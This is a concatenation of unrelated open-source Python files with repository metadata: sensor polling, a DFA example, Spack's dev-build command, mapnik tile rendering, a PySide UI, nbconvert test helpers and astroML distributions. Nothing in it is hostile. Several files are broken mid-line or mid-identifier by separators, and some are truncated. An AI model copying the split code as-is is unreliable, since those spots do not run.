    """Read the raw 12-bit temperature value from the sensor."""
    self.i2c.write8(0, 0x00)  # Set temp reading mode
    raw = self.i2c.readList(0, 2)
    # raw[0] holds the 8 MSBs; the top 4 bits of raw[1] hold the 4 LSBs
    # of the 12-bit reading.
    val = raw[0] << 4
    val |= raw[1] >> 4
    return val
  def readTemperature(self):
    """Return (raw_value, temperature_in_celsius)."""
    RawBytes = self.readRawTemp()
    # LSB = 0.0625 C, per the TMP102 data sheet.
    temp = float(float(RawBytes) * 0.0625)
    if (self.debug):
      print("DBG: Raw Temp: 0x%04X (%d)" % (RawBytes & 0xFFFF, RawBytes))
      print("DBG: Calibrated temperature = %f C" % temp)
    return RawBytes, temp
# Main loop: sample the sensor every two minutes and publish the reading
# (plus this sensor's weighting) to redis with a TTL so stale values
# expire if this node dies.
while True:
    try:
        mytemp = Tmp102(address=0x48)
        floattemp = mytemp.readTemperature()[1]
        # print ("Float temp = %f" % floattemp)
        redthis.set(sensor_name, floattemp)
        redthis.set(mult_name, multiplier)
        redthis.expire(sensor_name, time_to_live)
        redthis.expire(mult_name, time_to_live)
    except Exception:
        # Bug fix: the original bare "except:" also swallowed SystemExit
        # and KeyboardInterrupt, making the loop impossible to stop cleanly.
        print ("Unable to retrieve temperature")
    time.sleep(120)
|
bnookala/fsm
|
example.py
|
Python
|
mit
| 448
| 0.015625
|
#!/usr/bin/env python
# Bug fix: the shebang was missing its "!" (was "#/usr/bin/env python"),
# so the script could not be executed directly.
from fsm import Machine

# A three-state DFA over the alphabet {"0", "1"}: q1 is the start state
# and q2 is the only accepting state.
states = ["q1", "q2", "q3"]
alphabet = ["0", "1"]
transitions = {
    "q1": {"0": "q1", "1": "q2"},
    "q2": {"0": "q3", "1": "q2"},
    "q3": {"0": "q2", "1": "q2"},
}
start = "q1"
end = ["q2"]
machine = Machine.from_arguments(states, alphabet, transitions, start, end)
# Per the original annotations: non-string and empty inputs fail, the
# remaining example inputs end in the accepting state q2.
machine.run(123)  # fail
machine.run("")  # fail
machine.run("1")  # pass
machine.run("11")  # pass
machine.run("0100101")  # pass
|
polymorphm/scgi-wsgi-daemon
|
lib_scgi_wsgi_daemon__2011_08_06/daemonize.py
|
Python
|
gpl-3.0
| 1,222
| 0.003273
|
# -*- mode: python; coding: utf-8 -*-
#
# Copyright 2011 Andrej A Antonov <polymorphm@qmail.com>
#
# This program is free software:
|
you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at
|
your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
assert unicode is not str
def daemonize():
    """Detach the current process from its controlling terminal.

    Forks once (the parent exits immediately), then rebinds the three
    standard file descriptors to the null device.
    """
    import os
    if os.fork():
        # Parent: terminate, leaving only the child running.
        exit(os.EX_OK)
    # Close stdin/stdout/stderr; tolerate descriptors that are already closed.
    for fd in (0, 1, 2):
        try:
            os.close(fd)
        except OSError:
            pass
    # The lowest free descriptors are handed out in order, so these three
    # opens become the new fds 0, 1 and 2.
    for _ in range(3):
        os.open(os.devnull, os.O_RDWR)
|
rousseab/pymatgen
|
pymatgen/io/vaspio/vasp_output.py
|
Python
|
mit
| 539
| 0.003711
|
# coding: utf-8
#!/usr/bin/env python
from __future__ import division, unicode_literals
"""
Deprecation stub: pymatgen.io.vaspio.vasp_output has moved to
pymatgen.io.vasp.outputs.  Importing this module re-exports the new
location and emits a warning.
"""
__author__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Virtual Lab'
__version__ = '0.1'
__maintainer__ = 'Shyue Ping Ong'
__email__ = 'ongsp@ucsd.edu'
__date__ = '8/1/15'
import warnings
# Bug fix: the original implicit string concatenation produced
# "...has been moved pymatgen.io.vasp.outputs This stub..." -- the word
# "to" and the sentence break were missing.
warnings.warn("pymatgen.io.vaspio.vasp_output has been moved to "
              "pymatgen.io.vasp.outputs. "
              "This stub will be removed in pymatgen 4.0.")
from pymatgen.io.vasp.outputs import *
|
rspavel/spack
|
lib/spack/spack/cmd/dev_build.py
|
Python
|
lgpl-2.1
| 3,928
| 0
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
import os
import llnl.util.tty as tty
import spack.config
import spack.cmd
import spack.cmd.common.arguments as arguments
import spack.repo
from spack.stage import DIYStage
description = "developer build: build from code in current working directory"
section = "build"
level = "long"
def setup_parser(subparser):
    """Declare the dev-build command's CLI options on *subparser*.

    Called by Spack's command machinery; mutates *subparser* in place
    and returns nothing.
    """
    arguments.add_common_arguments(subparser, ['jobs'])
    subparser.add_argument(
        '-d', '--source-path', dest='source_path', default=None,
        help="path to source directory. defaults to the current directory")
    subparser.add_argument(
        '-i', '--ignore-dependencies', action='store_true', dest='ignore_deps',
        help="don't try to install dependencies of requested packages")
    arguments.add_common_arguments(subparser, ['no_checksum'])
    subparser.add_argument(
        '--keep-prefix', action='store_true',
        help="do not remove the install prefix if installation fails")
    subparser.add_argument(
        '--skip-patch', action='store_true',
        help="skip patching for the developer build")
    subparser.add_argument(
        '-q', '--quiet', action='store_true', dest='quiet',
        help="do not display verbose build output while installing")
    subparser.add_argument(
        '--drop-in', type=str, dest='shell', default=None,
        help="drop into a build environment in a new shell, e.g. bash, zsh")
    arguments.add_common_arguments(subparser, ['spec'])
    # -b/--before and -u/--until are alternative stop points: at most one.
    stop_group = subparser.add_mutually_exclusive_group()
    stop_group.add_argument(
        '-b', '--before', type=str, dest='before', default=None,
        help="phase to stop before when installing (default None)")
    stop_group.add_argument(
        '-u', '--until', type=str, dest='until', default=None,
        help="phase to stop after when installing (default None)")
    # --clean and --dirty are mutually exclusive environment choices.
    cd_group = subparser.add_mutually_exclusive_group()
    arguments.add_common_arguments(cd_group, ['clean', 'dirty'])
def dev_build(self, args):
    """Build a package from source code in a local working directory.

    Validates the single requested spec, concretizes it, stages the build
    out of ``args.source_path`` (default: cwd) via DIYStage, installs,
    and optionally drops into a build-environment shell.

    NOTE(review): the first parameter is named ``self`` although this is a
    module-level command function; confirm what Spack's command machinery
    actually passes here before renaming.
    """
    if not args.spec:
        tty.die("spack dev-build requires a package spec argument.")
    specs = spack.cmd.parse_specs(args.spec)
    # Exactly one spec is supported per invocation.
    if len(specs) > 1:
        tty.die("spack dev-build only takes one spec.")
    spec = specs[0]
    if not spack.repo.path.exists(spec.name):
        tty.die("No package for '{0}' was found.".format(spec.name),
                " Use `spack create` to create a new package")
    # dev-build requires an exact version so the build is reproducible.
    if not spec.versions.concrete:
        tty.die(
            "spack dev-build spec must have a single, concrete version. "
            "Did you forget a package version number?")
    spec.concretize()
    package = spack.repo.get(spec)
    if package.installed:
        tty.error("Already installed in %s" % package.prefix)
        tty.msg("Uninstall or try adding a version suffix for this dev build.")
        sys.exit(1)
    source_path = args.source_path
    if source_path is None:
        source_path = os.getcwd()
    source_path = os.path.abspath(source_path)
    # Forces the build to run out of the current directory.
    package.stage = DIYStage(source_path)
    # disable checksumming if requested
    if args.no_checksum:
        spack.config.set('config:checksum', False, scope='command_line')
    package.do_install(
        make_jobs=args.jobs,
        keep_prefix=args.keep_prefix,
        install_deps=not args.ignore_deps,
        verbose=not args.quiet,
        keep_stage=True, # don't remove source dir for dev build.
        dirty=args.dirty,
        stop_before=args.before,
        stop_at=args.until)
    # drop into the build environment of the package?
    if args.shell is not None:
        # NOTE(review): spack.build_environment is not imported at the top
        # of this file -- verify it is reachable via the spack package.
        spack.build_environment.setup_package(package, dirty=False)
        # Replaces this process with the requested shell.
        os.execvp(args.shell, [args.shell])
|
jharris2268/osmquadtreeutils
|
osmquadtreeutils/rendertiles.py
|
Python
|
gpl-3.0
| 3,227
| 0.047412
|
import mapnik
import subprocess,PIL.Image,cStringIO as StringIO
import time,sys,os
ew = 20037508.3428
tz = 8
def make_mapnik(fn, tabpp = None, scale=None, srs=None, mp=None, avoidEdges=False, abspath=True):
cc=[l for l in subprocess.check_output(['carto',fn]).split("\n") if not l.startswith('[millstone')]
if scale!=None:
for i,c in enumerate(cc):
if 'ScaleDenominator' in c:
sd=c.strip()[21:-22]
nsd=str(int(sd)*scale)
#print i,sd,"=>",nsd,
c=c.replace(sd, nsd)
#print c
cc[i]=c
bsp=''
if abspath:
a,b=os.path.split(fn)
if a:
bsp=a
#for i,c in enumerate(cc):
# if 'file' in c:
# if 'file=' in c:
# cc[i] = c.replace('file="','file="'+a+'/')
# elif 'name="file"><![CDATA[' in c:
# cc[i] = c.replace('CDATA[','CDATA['+a+'/')
|
if avoidEdges:
for i,c in enumerate(cc):
if '<ShieldSymbolizer size' in c:
cs = c.replace("ShieldSymbolizer size", "ShieldSymbolizer avo
|
id-edges=\"true\" size")
cc[i]=cs
if tabpp != None:
cc=[l.replace("planet_osm",tabpp) for l in cc]
#cc2=[c.replace("clip=\"false","clip=\"true") for c in cc]
#cc3=[c.replace("file=\"symbols", "file=\""+root+"/symbols") for c in cc2]
#cc4=[c.replace("CDATA[data", "CDATA["+root+"/data") for c in cc3]
if mp==None:
mp = mapnik.Map(256*tz,256*tz)
mapnik.load_map_from_string(mp,"\n".join(cc),False,bsp)
if srs!=None:
mp.srs=srs
#mp.buffer_size=128
return mp
def tilebound(z, x, y, tzp):
    """Return (meta_x, meta_y, debug_string, box) for the meta-tile holding (z, x, y).

    A meta-tile groups tzp x tzp ordinary tiles; the returned mapnik box
    is in spherical-mercator metres (world half-width ``ew``).
    """
    half_tiles = 1 << (z - 1)
    span = ew / half_tiles * tzp
    # Python-2 integer division: maps the tile index to its meta-tile.
    meta_x = x / tzp
    meta_y = y / tzp
    box = mapnik.Box2d(-ew + span * meta_x, ew - span * (meta_y + 1),
                       -ew + span * (meta_x + 1), ew - span * meta_y)
    info = "%d %d %d {%d %d %d %f} => %s" % (z, x, y, half_tiles, meta_x, meta_y, span, box)
    return meta_x, meta_y, info, box
def render_im(mp, bx, width, height=None, scale_factor=1.0, buffer_size=256):
    """Render box *bx* of map *mp* and return it as a PIL RGBA image.

    *height* defaults to *width* (square output); *buffer_size* is the
    mapnik render buffer in pixels.
    """
    if height is None:
        height = width
    mp.resize(width, height)
    mp.zoom_to_box(bx)
    mp.buffer_size = buffer_size
    canvas = mapnik.Image(mp.width, mp.height)
    mapnik.render(mp, canvas, scale_factor)
    dimensions = (mp.width, mp.height)
    return PIL.Image.frombytes('RGBA', dimensions, canvas.tostring())
def render_tile(mp,z,x,y):
    """Render the meta-tile containing (z, x, y) and return an iterator
    of its 256px sub-tiles as ((z, x, y), png_bytes) pairs.
    """
    st=time.time()
    # Higher zoom levels are rendered as larger meta-tiles (tzp tiles per
    # side) so one mapnik render call serves many output tiles.
    tzp = 1
    if z==13: tzp=2
    if z==14: tzp=4
    if z>=15: tzp=8
    #tzp = tz if z>10 else 1
    xx,yy,mm,bx=tilebound(z,x,y,tzp)
    print mm,
    sys.stdout.flush()
    pim = render_im(mp,bx,tzp*256)
    # Log elapsed render time next to the tile description.
    print "%-8.1fs" % (time.time()-st,)
    return iter_subtiles(pim,xx,yy,z,tzp)
def iter_subtiles(pim, xx, yy, z, tzp, ts=256):
    """Yield ((z, tile_x, tile_y), png_bytes) for each ts-pixel sub-tile of *pim*.

    (xx, yy) is the meta-tile index; tzp is the number of sub-tiles per side.
    """
    for col in xrange(tzp):
        for row in xrange(tzp):
            tile_x = xx * tzp + col
            tile_y = yy * tzp + row
            crop_box = [col * ts, row * ts, (col + 1) * ts, (row + 1) * ts]
            piece = pim.crop(crop_box)
            buf = StringIO.StringIO()
            piece.save(buf, format='PNG')
            yield (z, tile_x, tile_y), buf.getvalue()
|
fbradyirl/home-assistant
|
homeassistant/components/simplisafe/const.py
|
Python
|
apache-2.0
| 203
| 0
|
"""Define constants for the SimpliSafe component."""
from datetime import timedelta
DOMAIN = "simplisafe"
DATA_CLIENT = "client"
DEFAULT_SCAN_INTERVAL =
|
timedelta(seconds=30)
TOPIC_UPDATE = "u
|
pdate"
|
JeffHoogland/mtg-totals
|
Qt/ui_mainWindow.py
|
Python
|
bsd-3-clause
| 13,255
| 0.001283
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainWindow.ui'
#
# Created: Fri Sep 25 14:24:01 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
mainWindow.setObjectName("mainWindow")
mainWindow.resize(474, 557)
self.centralwidget = QtGui.QWidget(mainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_13 = QtGui.QVBoxLayout(self.centralwidget)
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.frame_3 = QtGui.QFrame(self.centralwidget)
self.frame_3.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtGui.QFrame.Raised)
self.frame_3.setObjectName("frame_3")
self.horizontalLayout = QtGui.QHBoxLayout(self.frame_3)
self.horizontalLayout.setObjectName("horizontalLayout")
self.frame_2 = QtGui.QFrame(self.frame_3)
self.frame_2.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtGui.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.verticalLayout_7 = QtGui.QVBoxLayout(self.frame_2)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.p1Label = QtGui.QLabel(self.frame_2)
self.p1Label.setObjectName("p1Label")
self.verticalLayout_7.addWidget(self.p1Label)
self.frame = QtGui.QFrame(self.frame_2)
self.frame.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame.setFrameShadow(QtGui.QFrame.Raised)
self.frame.setObjectName("frame")
self.verticalLayout_2 = QtGui.QVBoxLayout(self.frame)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_2 = QtGui.QLabel(self.frame)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.p1Name = QtGui.QLineEdit(self.frame)
self.p1Name.setObjectName("p1Name")
self.verticalLayout_2.addWidget(self.p1Name)
self.verticalLayout_7.addWidget(self.frame)
self.frame_4 = QtGui.QFrame(self.frame_2)
self.frame_4.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtGui.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.verticalLayout_3 = QtGui.QVBoxLayout(self.frame_4)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_3 = QtGui.QLabel(self.frame_4)
self.label_3.setObjectName("label_3")
self.verticalLayout_3.addWidget(self.label_3)
self.p1Deck = QtGui.QLineEdit(self.frame_4
|
)
self.p1Deck.setObjectName("p1Deck")
self.verticalLayout_3.addWidget(self.p1Deck)
self.verticalLayout_7.addWidget(self.frame_4)
self.frame_14 = QtGui.QFrame(self.frame_2)
self.frame_14.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_14.setFrameShadow(QtGui.QFrame.Raised)
self.frame_14.setObjectName("frame_14")
self.verticalLayout_8 = QtGui.QVBoxLayout(self.frame_14)
s
|
elf.verticalLayout_8.setObjectName("verticalLayout_8")
self.label_11 = QtGui.QLabel(self.frame_14)
self.label_11.setObjectName("label_11")
self.verticalLayout_8.addWidget(self.label_11)
self.p1Life = QtGui.QSpinBox(self.frame_14)
self.p1Life.setMaximum(10000)
self.p1Life.setProperty("value", 20)
self.p1Life.setObjectName("p1Life")
self.verticalLayout_8.addWidget(self.p1Life)
self.verticalLayout_7.addWidget(self.frame_14)
self.frame_16 = QtGui.QFrame(self.frame_2)
self.frame_16.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_16.setFrameShadow(QtGui.QFrame.Raised)
self.frame_16.setObjectName("frame_16")
self.verticalLayout_10 = QtGui.QVBoxLayout(self.frame_16)
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.label_13 = QtGui.QLabel(self.frame_16)
self.label_13.setObjectName("label_13")
self.verticalLayout_10.addWidget(self.label_13)
self.p1Infect = QtGui.QSpinBox(self.frame_16)
self.p1Infect.setMaximum(10000)
self.p1Infect.setObjectName("p1Infect")
self.verticalLayout_10.addWidget(self.p1Infect)
self.verticalLayout_7.addWidget(self.frame_16)
self.frame_11 = QtGui.QFrame(self.frame_2)
self.frame_11.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_11.setFrameShadow(QtGui.QFrame.Raised)
self.frame_11.setObjectName("frame_11")
self.verticalLayout = QtGui.QVBoxLayout(self.frame_11)
self.verticalLayout.setObjectName("verticalLayout")
self.label_9 = QtGui.QLabel(self.frame_11)
self.label_9.setObjectName("label_9")
self.verticalLayout.addWidget(self.label_9)
self.p1GameWins = QtGui.QSpinBox(self.frame_11)
self.p1GameWins.setMaximum(1000)
self.p1GameWins.setObjectName("p1GameWins")
self.verticalLayout.addWidget(self.p1GameWins)
self.verticalLayout_7.addWidget(self.frame_11)
self.horizontalLayout.addWidget(self.frame_2)
self.frame_5 = QtGui.QFrame(self.frame_3)
self.frame_5.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_5.setFrameShadow(QtGui.QFrame.Raised)
self.frame_5.setObjectName("frame_5")
self.verticalLayout_9 = QtGui.QVBoxLayout(self.frame_5)
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.p2Label = QtGui.QLabel(self.frame_5)
self.p2Label.setObjectName("p2Label")
self.verticalLayout_9.addWidget(self.p2Label)
self.frame_6 = QtGui.QFrame(self.frame_5)
self.frame_6.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_6.setFrameShadow(QtGui.QFrame.Raised)
self.frame_6.setObjectName("frame_6")
self.verticalLayout_4 = QtGui.QVBoxLayout(self.frame_6)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.label_6 = QtGui.QLabel(self.frame_6)
self.label_6.setObjectName("label_6")
self.verticalLayout_4.addWidget(self.label_6)
self.p2Name = QtGui.QLineEdit(self.frame_6)
self.p2Name.setObjectName("p2Name")
self.verticalLayout_4.addWidget(self.p2Name)
self.verticalLayout_9.addWidget(self.frame_6)
self.frame_7 = QtGui.QFrame(self.frame_5)
self.frame_7.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_7.setFrameShadow(QtGui.QFrame.Raised)
self.frame_7.setObjectName("frame_7")
self.verticalLayout_5 = QtGui.QVBoxLayout(self.frame_7)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.label_7 = QtGui.QLabel(self.frame_7)
self.label_7.setObjectName("label_7")
self.verticalLayout_5.addWidget(self.label_7)
self.p2Deck = QtGui.QLineEdit(self.frame_7)
self.p2Deck.setObjectName("p2Deck")
self.verticalLayout_5.addWidget(self.p2Deck)
self.verticalLayout_9.addWidget(self.frame_7)
self.frame_15 = QtGui.QFrame(self.frame_5)
self.frame_15.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_15.setFrameShadow(QtGui.QFrame.Raised)
self.frame_15.setObjectName("frame_15")
self.verticalLayout_11 = QtGui.QVBoxLayout(self.frame_15)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.label_12 = QtGui.QLabel(self.frame_15)
self.label_12.setObjectName("label_12")
self.verticalLayout_11.addWidget(self.label_12)
self.p2Life = QtGui.QSpinBox(self.frame_15)
self.p2Life.setMaximum(10000)
self.p2Life.setProperty("value", 20)
self.p2Life.setObjectName("p2Life")
self.verticalLayout_11.addWidget(self.p2Life)
self.verticalLayout_9.addWidget(self.frame_15)
self.frame_17 = QtGui.QFrame(self.frame_5)
self.frame_17.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_17.setFrameShadow(QtGui.QFrame.Raised)
self.frame_17.setObjectName("frame_17")
self.verticalLayout_12 = QtGui.QVBox
|
unnikrishnankgs/va
|
venv/lib/python3.5/site-packages/nbconvert/tests/base.py
|
Python
|
bsd-2-clause
| 5,773
| 0.003811
|
"""Base test class for nbconvert"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os
import glob
import shlex
import shutil
import sys
import unittest
import nbconvert
from subprocess import Popen, PIPE
import nose.tools as nt
from nbformat import v4, write
from testpath.tempdir import TemporaryWorkingDirectory
from ipython_genutils.py3compat import string_types, bytes_to_str
class TestsBase(unittest.TestCase):
    """Base tests class. Contains useful fuzzy comparison and nbconvert
    functions."""
    def fuzzy_compare(self, a, b, newlines_are_spaces=True, tabs_are_spaces=True,
                      fuzzy_spacing=True, ignore_spaces=False,
                      ignore_newlines=False, case_sensitive=False, leave_padding=False):
        """
        Performs a fuzzy comparison of two strings.  A fuzzy comparison is a
        comparison that ignores insignificant differences in the two comparands.
        The significance of certain differences can be specified via the keyword
        parameters of this method.

        Note: the transformations are applied in declaration order, so
        ``ignore_newlines`` (removal) runs before ``newlines_are_spaces``;
        when both are set the newlines are simply removed.
        """
        if not leave_padding:
            a = a.strip()
            b = b.strip()
        if ignore_newlines:
            a = a.replace('\n', '')
            b = b.replace('\n', '')
        if newlines_are_spaces:
            a = a.replace('\n', ' ')
            b = b.replace('\n', ' ')
        if tabs_are_spaces:
            a = a.replace('\t', ' ')
            b = b.replace('\t', ' ')
        if ignore_spaces:
            a = a.replace(' ', '')
            b = b.replace(' ', '')
        if fuzzy_spacing:
            # Collapse runs of spaces down to single spaces.
            a = self.recursive_replace(a, '  ', ' ')
            b = self.recursive_replace(b, '  ', ' ')
        if not case_sensitive:
            a = a.lower()
            b = b.lower()
        self.assertEqual(a, b)
    def recursive_replace(self, text, search, replacement):
        """
        Performs a recursive replacement operation.  Replaces all instances
        of a search string in a text string with a replacement string until
        the search string no longer exists.  Recursion is needed because the
        replacement string may generate additional search strings.

        For example:
        Replace "ii" with "i" in the string "Hiiii" yields "Hii"
        Another replacement yields "Hi" (the desired output)

        Parameters
        ----------
        text : string
            Text to replace in.
        search : string
            String to search for within "text"
        replacement : string
            String to replace "search" with
        """
        while search in text:
            text = text.replace(search, replacement)
        return text
    def create_temp_cwd(self, copy_filenames=None):
        """Create and return a TemporaryWorkingDirectory handler, optionally
        copying the named test fixture files into it first."""
        temp_dir = TemporaryWorkingDirectory()
        #Copy the files if requested.
        if copy_filenames is not None:
            self.copy_files_to(copy_filenames, dest=temp_dir.name)
        #Return directory handler
        return temp_dir
    def create_empty_notebook(self, path):
        """Write an empty nbformat-v4 notebook to *path*."""
        nb = v4.new_notebook()
        with io.open(path, 'w', encoding='utf-8') as f:
            write(nb, f, 4)
    def copy_files_to(self, copy_filenames, dest='.'):
        "Copy test files into the destination directory"
        if not os.path.isdir(dest):
            os.makedirs(dest)
        files_path = self._get_files_path()
        # Each entry may be a glob pattern; every match is copied flat into dest.
        for pattern in copy_filenames:
            files = glob.glob(os.path.join(files_path, pattern))
            assert files
            for match in files:
                shutil.copyfile(match, os.path.join(dest, os.path.basename(match)))
    def _get_files_path(self):
        """Return the absolute path of this test module's "files" directory."""
        #Get the relative path to this module in the IPython directory.
        names = self.__module__.split('.')[1:-1]
        names.append('files')
        #Build a path using the nbconvert directory and the relative path we just
        #found.
        path = os.path.dirname(nbconvert.__file__)
        return os.path.join(path, *names)
    def nbconvert(self, parameters, ignore_return_code=False, stdin=None):
        """
        Run nbconvert as a shell command, listening for both Errors and
        non-zero return codes. Returns the tuple (stdout, stderr) of
        output produced during the nbconvert run.

        Parameters
        ----------
        parameters : str, list(str)
            List of parameters to pass to IPython.
        ignore_return_code : optional bool (default False)
            If False, raise an OSError (carrying stderr) when the
            nbconvert process exits with a non-zero return code.
        stdin : optional bytes
            Data passed to the subprocess's standard input.
        """
        if isinstance(parameters, string_types):
            parameters = shlex.split(parameters)
        cmd = [sys.executable, '-m', 'nbconvert'] + parameters
        p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
        stdout, stderr = p.communicate(input=stdin)
        if not (p.returncode == 0 or ignore_return_code):
            raise OSError(bytes_to_str(stderr))
        return stdout.decode('utf8', 'replace'), stderr.decode('utf8', 'replace')
def assert_big_text_equal(a, b, chunk_size=80):
    """assert that large strings are equal

    Zooms in on first chunk that differs,
    to give better info than vanilla assertEqual for large text blobs.
    """
    # Compare chunk by chunk so the failure message pinpoints the offset.
    for i in range(0, len(a), chunk_size):
        chunk_a = a[i:i + chunk_size]
        chunk_b = b[i:i + chunk_size]
        nt.assert_equal(chunk_a, chunk_b, "[offset: %i]\n%r != \n%r" % (
            i, chunk_a, chunk_b))
    # NOTE(review): when len(a) > len(b), the chunk loop above already fails
    # on the first chunk that overruns b, so this branch appears unreachable.
    if len(a) > len(b):
        nt.fail("Length doesn't match (%i > %i). Extra text:\n%r" % (
            len(a), len(b), a[len(b):]
        ))
    elif len(a) < len(b):
        nt.fail("Length doesn't match (%i < %i). Extra text:\n%r" % (
            len(a), len(b), b[len(a):]
        ))
|
nhuntwalker/astroML
|
astroML/stats/random.py
|
Python
|
bsd-2-clause
| 3,890
| 0.000771
|
"""
Statistics for astronomy
"""
import numpy as np
from scipy.stats.distributions import rv_continuous
def bivariate_normal(mu=[0, 0], sigma_1=1, sigma_2=1, alpha=0,
                     size=None, return_cov=False):
    """Draw samples from a rotated 2D normal distribution.

    Parameters
    ----------
    mu : array-like (length 2)
        Mean of the distribution.
    sigma_1, sigma_2 : float
        Widths along the unrotated x and y axes.
    alpha : float
        Counter-clockwise rotation angle about the origin.
    size : tuple of ints, optional
        Shape of the sample array; each sample is 2-dimensional, so the
        returned array has shape ``size + (2,)`` (a single sample if omitted).
    return_cov : bool, optional
        If True, also return the 2x2 covariance matrix.

    Returns
    -------
    out : ndarray
        The drawn samples.
    cov : ndarray
        The 2x2 covariance matrix (only when ``return_cov`` is True).

    Notes
    -----
    The covariance matrix is assembled from the widths and rotation, then
    passed to ``np.random.multivariate_normal``; call that directly if you
    already have a covariance matrix.
    """
    cos_a = np.cos(alpha)
    sin_a = np.sin(alpha)
    # Rotate the axis-aligned covariance by alpha.
    sigma_xx = (sigma_1 * cos_a) ** 2 + (sigma_2 * sin_a) ** 2
    sigma_yy = (sigma_1 * sin_a) ** 2 + (sigma_2 * cos_a) ** 2
    sigma_xy = (sigma_1 ** 2 - sigma_2 ** 2) * sin_a * cos_a
    cov = np.array([[sigma_xx, sigma_xy],
                    [sigma_xy, sigma_yy]])
    samples = np.random.multivariate_normal(mu, cov, size)
    return (samples, cov) if return_cov else samples
#----------------------------------------------------------------------
# Define some new distributions based on rv_continuous
class trunc_exp_gen(rv_continuous):
    """A truncated positive exponential continuous random variable.
    The probability distribution is::
        p(x) ~ exp(k * x)    between a and b
             = 0             otherwise
    The arguments are (a, b, k)
    %(before_notes)s
    %(example)s
    """
    def _argcheck(self, a, b, k):
        # Cache the normalisation constant for _pdf and _rvs.
        self._const = k / (np.exp(k * b) - np.exp(k * a))
        return (a != b) and not np.isinf(k)
    def _pdf(self, x, a, b, k):
        pdf = self._const * np.exp(k * x)
        pdf[(x < a) | (x > b)] = 0
        return pdf
    def _rvs(self, a, b, k):
        # Inverse-CDF sampling.  Bug fix: the original used
        # log(1 + y*k/const), which implicitly assumes a == 0; inverting
        # the truncated CDF correctly starts from exp(k*a), so samples
        # always land inside [a, b].
        y = np.random.random(self._size)
        return (1. / k) * np.log(np.exp(k * a) + y * k / self._const)
trunc_exp = trunc_exp_gen(name="trunc_exp", shapes='a, b, k')
class linear_gen(rv_continuous):
    """A truncated linear continuous random variable.
    The probability distribution is::
        p(x) ~ c * x + d    between a and b
             = 0            otherwise
    The arguments are (a, b, c).  d is set by the normalization
    %(before_notes)s
    %(example)s
    """
    def _argcheck(self, a, b, c):
        # Valid when the support is non-degenerate and the slope is finite.
        return (a != b) and not np.isinf(c)
    def _pdf(self, x, a, b, c):
        # Intercept chosen so the density integrates to one over [a, b].
        intercept = 1. / (b - a) - 0.5 * c * (b + a)
        density = c * x + intercept
        outside = (x < a) | (x > b)
        density[outside] = 0
        return density
    def _rvs(self, a, b, c):
        # Inverse-CDF sampling for the linear density.
        midpoint = 0.5 * (a + b)
        width = (b - a)
        shift = 1. / c / width - midpoint
        u = np.random.random(self._size)
        return -shift + np.sqrt(2. * u / c + a * a + 2. * a * shift + shift * shift)
linear = linear_gen(name="linear", shapes='a, b, c')
|
ksmit799/Toontown-Source
|
toontown/minigame/RaceGameGlobals.py
|
Python
|
mit
| 1,615
| 0.003096
|
from toontown.toonbase import TTLocalizer
ValidChoices = [0,
1,
2,
3,
4]
NumberToWin = 14
InputTimeout = 20
ChanceRewards = (((1, 0), TTLocalizer.RaceGameForwardOneSpace, 0),
((1, 0), TTLocalizer.RaceGameForwardOneSpace, 0),
((1, 0), TTLocalizer.RaceGameForwardOneSpace, 0),
((2, 0), TTLocalizer.RaceGameForwardTwoSpaces, 0),
((2, 0), TTLocalizer.RaceGameForwardTwoSpaces, 0),
((2, 0), TTLocalizer.RaceGameForwardTwoSpaces, 0),
((3, 0), TTLocalizer.RaceGameForwardThreeSpaces, 0),
((3, 0), TTLocalizer.RaceGameForwardThreeSpaces, 0),
((3, 0), TTLocalizer.RaceGameForwardThreeSpaces, 0),
((0, -3), TTLocalizer.RaceGameOthersBackThree, 0),
((0, -3), TTLocalizer.RaceGameOthersBackThree, 0),
((-1, 0), TTLocalizer.RaceGameBackOneSpace, 0),
((-1, 0), TTLocalizer.RaceGameBackOneSpace, 0),
((-2, 0), TTLocalizer.RaceGameBackTwoSpaces, 0),
((-2, 0), TTLocalizer.RaceGameBackTwoSpaces, 0),
((-3, 0), TTLocalizer.RaceGameBackThreeSpaces, 0),
